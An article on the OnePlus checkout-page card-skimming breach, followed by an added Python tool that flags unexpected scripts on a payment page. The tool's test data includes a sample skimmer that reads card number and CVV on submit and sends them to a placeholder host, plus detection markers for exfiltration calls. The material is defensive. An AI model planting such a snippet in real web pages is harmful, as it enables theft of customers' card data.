Reports began to surface last weekend from people who had made purchases on smartphone startup OnePlus' website and then seen unauthorized transactions appear on their credit cards. OnePlus quickly released a statement on its website confirming it had been hacked, “and up to 40K users at oneplus.net may be affected by the incident”. The company has emailed all potentially affected users. Users who entered their credit card details into oneplus.net between mid-November 2017 and January 11, 2018 are potentially affected. Customers who paid with a previously saved credit card or with PayPal should not be affected.
OnePlus updated the statement today with further information. It described a malicious script that had been injected into its payment page code “to sniff out credit card while it was being entered”, intermittently capturing card data and sending it directly from the user's browser. The startup reassured its customers that the malicious script has since been removed, that the infected server has been quarantined, and that it has “reinforced all relevant system structures”.
OnePlus advised all customers who visited the site during that period and entered their credit card details to check their card statements and report any unauthorized transactions to their bank.
OnePlus also said it was temporarily suspending credit card payments on its site; payments via PayPal remain available. Its investigation into what happened is continuing, and the company said “we are working with our providers and local authorities to better address the incident”.
The investigation began after a poll posted by users on OnePlus' forums showed that many customers had experienced the same problem: 174 respondents said they had found fraudulent transactions on their cards after making a purchase from OnePlus.
Fidus, a new security firm (“founded by two penetration testers” in Cambridge, UK), carried out its own examination of the payment flow on OnePlus' site as it currently stands and speculated about how the compromise could have been carried out. Fidus immediately noted that OnePlus runs the Magento eCommerce platform, which has previously been the target of a series of credit card skimming attacks. Fidus also observed that “the payment page which requests the customer's card details is hosted ON-SITE”. They added, “This means all payment details entered, albeit briefly, flow through the OnePlus website and can be intercepted by an attacker. Whilst the payment details are sent off to a third-party provider upon form submission, there is a window in which malicious code is able to siphon credit card details before the data is encrypted.” In other words, because the card form lives in the merchant's own page, any script that runs in that page, legitimate or injected, can read the card fields before the browser ever sends them to the payment provider.
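The following Python script is an added example (not code from the article, OnePlus or Fidus) of one check a shop operator can run to catch the kind of change described above: it records a baseline of the scripts a trusted copy of the checkout page serves (the URLs of external scripts and SHA-256 hashes of inline scripts), then reports any script on the live page that falls outside that baseline, with a rough heuristic that marks inline scripts which both read card fields and contain a way to send data out of the browser. The hostnames shop.example and collector.invalid, the form field names, and the injected snippet are constructed placeholders for illustration; the injected snippet is a generic stand-in for the behaviour the article describes, not the script used against OnePlus.

```python
import hashlib
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Collects every <script> element on a page as (src, inline_body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:          # only buffer text inside <script>
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._src, self._buf = None, None


def collect_scripts(html):
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def _sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(known_good_html):
    """External script URLs and inline-script hashes from a trusted copy of the page."""
    srcs, inline = set(), set()
    for src, body in collect_scripts(known_good_html):
        if src:
            srcs.add(src)
        elif body:
            inline.add(_sha256(body))
    return {"srcs": srcs, "inline": inline}


# Heuristic markers (constructed for this example): an inline script that both
# touches payment fields and has a way to send data off-page deserves a look.
FIELD_MARKERS = ("cc_", "card", "cvv", "cvc", "expir")
EXFIL_MARKERS = ("xmlhttprequest", "fetch(", "sendbeacon", "new image", "websocket")


def looks_like_skimmer(body):
    text = body.lower()
    return any(m in text for m in FIELD_MARKERS) and any(m in text for m in EXFIL_MARKERS)


def audit(page_html, baseline):
    """Return findings for every script on the live page that is not in the baseline."""
    findings = []
    for src, body in collect_scripts(page_html):
        if src:
            if src not in baseline["srcs"]:
                findings.append({"kind": "unexpected-src", "src": src, "skimmer_like": False})
        elif body and _sha256(body) not in baseline["inline"]:
            findings.append({"kind": "unexpected-inline", "sha256": _sha256(body)[:16],
                             "skimmer_like": looks_like_skimmer(body)})
    return findings


# Constructed sample: a trusted copy of the checkout page (hypothetical shop.example host).
KNOWN_GOOD_CHECKOUT = """<html><head>
<script src="https://shop.example/static/checkout.js"></script>
<script>window.checkoutConfig = {"currency": "USD", "gateway": "psp.example"};</script>
</head><body>
<form id="payment" method="post" action="/checkout/submit">
<input name="cc_number"><input name="cc_cvv"><input name="cc_expiry">
</form></body></html>"""

# Constructed sample: the same page with an extra inline script appended to the body,
# a generic stand-in for injected code that reads the card fields on submit and sends
# them to a third party (collector.invalid is a placeholder, not a real host).
INJECTED_SCRIPT = """<script>
document.getElementById("payment").addEventListener("submit", function () {
  var card = document.querySelector("[name=cc_number]").value +
             "|" + document.querySelector("[name=cc_cvv]").value;
  new Image().src = "https://collector.invalid/?d=" + btoa(card);
});
</script>"""
TAMPERED_CHECKOUT = KNOWN_GOOD_CHECKOUT.replace("</body>", INJECTED_SCRIPT + "\n</body>")


if __name__ == "__main__":
    baseline = build_baseline(KNOWN_GOOD_CHECKOUT)
    for name, html in (("known-good", KNOWN_GOOD_CHECKOUT), ("tampered", TAMPERED_CHECKOUT)):
        print(name, audit(html, baseline) or "no unexpected scripts")
```

The baseline must come from a trusted artifact (the deployed template in version control or a release build), not from the live server, since a compromised server will happily serve the injected script as the "baseline". A URL allowlist also says nothing about the contents of an external file, so an attacker who edits an already-allowed file on the server evades it; subresource integrity attributes on external scripts and a Content-Security-Policy that limits where the page may load scripts from and send requests to close that gap. None of this removes the window Fidus describes: as long as the card form is rendered inside the merchant's own page, its DOM is reachable by any script that runs there, which is why moving card entry to a page or iframe hosted by the payment provider is the structural fix.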
Credit card fraud tied to compromised Magento stores has been reported since 2015.
In its statement, OnePlus said it was “working with our current payment providers to implement a more secure credit card payment method” and conducting “an in-depth security audit” to prevent such incidents from happening again.